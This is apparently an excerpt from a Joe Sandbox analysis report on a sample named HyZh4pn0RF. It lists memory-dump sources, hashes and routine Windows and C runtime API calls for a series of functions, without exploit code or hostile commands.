                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1707611234-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
                                                                                                                                                                                                                                                                                                  • Instruction ID: 68c26b0444b4e9e98e1628c4363a82c4c34310d4fbea70a8ec63c2c3720cd346
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76118F3270C68685EB54AB51A4514BEF7A0FF85761FB00237EA9D869E8EF2CD054CB20
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78F497F39), ref: 00007FF78F4980DF
                                                                                                                                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78F497F39), ref: 00007FF78F4980F5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1707611234-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a96e0719182de34ecec5e80d0f089f3d687da4b36ed0106fdd62851d0e6a23ab
                                                                                                                                                                                                                                                                                                  • Instruction ID: 603bff9970b9e042792e9da38cef14ba26726ce02a6897dc3c2d51a1e846c51e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a96e0719182de34ecec5e80d0f089f3d687da4b36ed0106fdd62851d0e6a23ab
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38017C3261C29582E750AB15E4016BAF7A0FB81B61FB00237E6AD025E8DB3DD014CB20
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF22
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF2C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                                                                                                                                                                                                                                                                  • Instruction ID: b42410086164377a948ba5d03231c2c91ebc7231fa3ae0e3eac399064006267e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97E08670F096C242FF54BBB254454F591D17F88B01FE44436CC0E47262EE2C6899C230
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 377330604-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 42a1bd2f5f877487fcba1cf9d8631ea5f2645d0e4a2ca602a01a9d6e84267574
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1D0C930F5E58382EA54377218899B9A6903F44731FF00636C02D821F0DE2CA89A8231
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2018770650-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
                                                                                                                                                                                                                                                                                                  • Instruction ID: 05e2ed3522f42647a04134bcb1e12180c29e0befb27f11489e88aacb5114006b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5ED0C930F1A58381E654377A08459F991903F54721FF00636C12D832F0DE6CA8998531
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF78F49AF99,?,?,00000000,00007FF78F49B04E), ref: 00007FF78F49B18A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF78F49AF99,?,?,00000000,00007FF78F49B04E), ref: 00007FF78F49B194
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9837e0b96fb932410bbb62f6340f49a36731f04e136fccbecc78bea00fdc6ecc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03212631B182C241FA90772494456FD92827F847E8FF44237DA6D473E2CE2CE849C320
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A
                                                                                                                                                                                                                                                                                                  • _findclose.LIBCMT ref: 00007FF78F487F99
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2772937645-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
                                                                                                                                                                                                                                                                                                  • Instruction ID: 129ae984909957d6d0561a44a1b3398b324ba929837e63bf7e99f57d557dcc43
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9471A362E18AC581E611DB2CD5452FDB360F7A9B4CFA4E325DB9C12592EF28E2D9C700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                                                                                                                                                                                                                                                                  • Instruction ID: e4c243fa1b6e911995838647a76982877dda228a0d14d6b28cc108fda3ac590c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC41B672B0828287FA24EB19A540AB9B7A0FB55B55FA00132D78D837A1CF6CE442C770
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f38816a1396df6c3fe935ea55d49c1b180c6beea1b2607ef6d81d6429394b577
                                                                                                                                                                                                                                                                                                  • Instruction ID: 14c697f8607ed99fcf57150b9ce3260517907a67e10d5fb9882f12d4060a6b11
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f38816a1396df6c3fe935ea55d49c1b180c6beea1b2607ef6d81d6429394b577
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A21A331B286D246FA50BB2269047FAE651BF85BD4FEC5432EE0D07786DE3EE041C620
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d54dce22697bb10e63bae3279fa2e824b8e2fea5618a93339fcffd40c7be65f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0318131B1868285F751BB558441BFCA690BF84B61FB10237DA1D873E2DE7CE585C621
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8aee16307e8b241f0c7484ee8197df944ef7995362acbd600d33a09e4226aa94
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B218132B047858AEB24AF64C444AECB7A8FB08718FA44636E71C47AE9EF78D544C750
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f95d9ed461cd1bdd15efeba996d552df86a6f739b169855eca8ab412cdd73fd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3118431B1C6C181EA60BF519401AF9E2A0BF85B84FA44436EA4C47AA6DF7CD580D764
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7dd8006ea55d4a03fb95260cfd9253850735e261f1cb645f74191a0db6318d46
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C821A732619AC187DB61AF19E4407B9B7A0FB84B94FB44236EA5D476DAEF3CD401CB10
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0c57adeaad2e28e201e00d68afa53e62c230ee314df2c20f3ef83105df95a467
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9018271B0878141EA04EB6A99005E9E691BF85FE0BA84636DE5C57BE7CE3CD401C310
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
